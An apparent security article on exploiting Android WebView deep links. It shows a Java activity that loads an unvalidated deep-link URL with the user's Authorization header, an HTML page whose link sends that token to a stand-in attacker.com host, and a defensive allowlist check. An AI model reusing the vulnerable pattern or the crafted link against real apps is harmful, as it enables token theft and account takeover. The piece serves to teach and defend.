How Threat Actors are Exploiting Android Webview
WebView is a simple but powerful way to present web-based content in Android. It is used as a dedicated web browser instance of an application that can deliver web pages to users. WebView was first released as a part of Android 4.4. Since Android 5.0, it is included as a system application.
WebView vulnerabilities that allow threat actors to:
We will use the following AndroidManifest.xml file to understand how threat actors can exploit WebView:

```xml
<activity android:name=".DeeplinkActivity">
    <intent-filter>
        <action android:name="android.intent.action.VIEW" />
        <category android:name="android.intent.category.DEFAULT" />
        <data android:scheme="myapp" android:host="deeplink" />
    </intent-filter>
</activity>
```
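Let’s assume that the activity processes WebView deep links as follows:

```java
import android.app.Activity;
import android.content.Intent;
import android.net.Uri;
import android.os.Bundle;
import android.webkit.WebView;

import java.util.HashMap;
import java.util.Map;

public class DeeplinkActivity extends Activity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        handleDeeplink(getIntent());
    }

    private void handleDeeplink(Intent intent) {
        Uri deeplink = intent.getData();
        if ("/webview".equals(deeplink.getPath())) {
            // The "url" query parameter comes straight from the deep link,
            // so whoever crafted the link controls it.
            String url = deeplink.getQueryParameter("url");
            handleWebViewDeeplink(url);
        }
    }

    private void handleWebViewDeeplink(String url) {
        WebView webView = …;
        setupWebView(webView); // defined elsewhere in the app (not shown)
        // Vulnerable: the URL is loaded without any validation, and the
        // user's token is attached to the request regardless of the host.
        webView.loadUrl(url, getAuthHeaders());
    }

    private Map<String, String> getAuthHeaders() {
        Map<String, String> headers = new HashMap<>();
        headers.put("Authorization", getUserToken()); // getUserToken() not shown
        return headers;
    }
}
```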
In this case an attacker can carry out a remote attack to obtain the user’s authentication token by creating a page with the following code:
```html
<html>
<body style="text-align: center;">
    <h1><a href="myapp://deeplink/webview?url=https://attacker.com/">Click Me!</a></h1>
</body>
</html>
```
When the victim clicks the “Click Me!” link, the vulnerable app opens https://attacker[.]com in the WebView and sends the authorization header along with the request. The attacker can then use the stolen authentication token to gain full access to the victim’s account.
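The check missing from `handleWebViewDeeplink()` above can be sketched as follows. This is an added example, not code from the original article: the class name `DeeplinkUrlPolicy`, the allowlisted hosts and the sample URLs are assumptions, and it uses `java.net.URI` instead of `android.net.Uri` so that it runs off-device.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Locale;
import java.util.Map;
import java.util.Set;

public class DeeplinkUrlPolicy {
    // Assumption: the only hosts that should ever receive the user's token.
    private static final Set<String> TRUSTED_HOSTS = Set.of("app.example.com", "help.example.com");

    /** True only for https URLs whose exact host is on the allowlist. */
    static boolean isTrusted(String url) {
        if (url == null) return false;
        final URI uri;
        try {
            uri = new URI(url);
        } catch (URISyntaxException e) {
            return false; // malformed input is rejected, never "repaired"
        }
        if (!"https".equalsIgnoreCase(uri.getScheme())) return false; // no http, file, javascript
        if (uri.getUserInfo() != null) return false;                  // blocks trusted@attacker tricks
        String host = uri.getHost();
        if (host == null) return false;
        int port = uri.getPort();
        if (port != -1 && port != 443) return false;
        // Exact match only: endsWith()/contains() would accept look-alike hosts.
        return TRUSTED_HOSTS.contains(host.toLowerCase(Locale.ROOT));
    }

    /** Headers for loadUrl(): the token is attached only for trusted URLs. */
    static Map<String, String> headersFor(String url, String userToken) {
        return isTrusted(url) ? Map.of("Authorization", userToken) : Map.of();
    }

    public static void main(String[] args) {
        String[] samples = { // constructed inputs
            "https://app.example.com/account",
            "https://attacker.com/",
            "http://app.example.com/",
            "https://app.example.com@attacker.com/",
            "https://app.example.com.attacker.com/",
            "javascript:alert(1)",
        };
        for (String s : samples) {
            System.out.printf("%-42s trusted=%b headers=%s%n", s, isTrusted(s), headersFor(s, "<token>").keySet());
        }
    }
}
```

Only the first sample is reported as trusted. In the activity, a URL that fails `isTrusted()` should not be loaded in the in-app WebView at all, so the token never leaves for an unknown host.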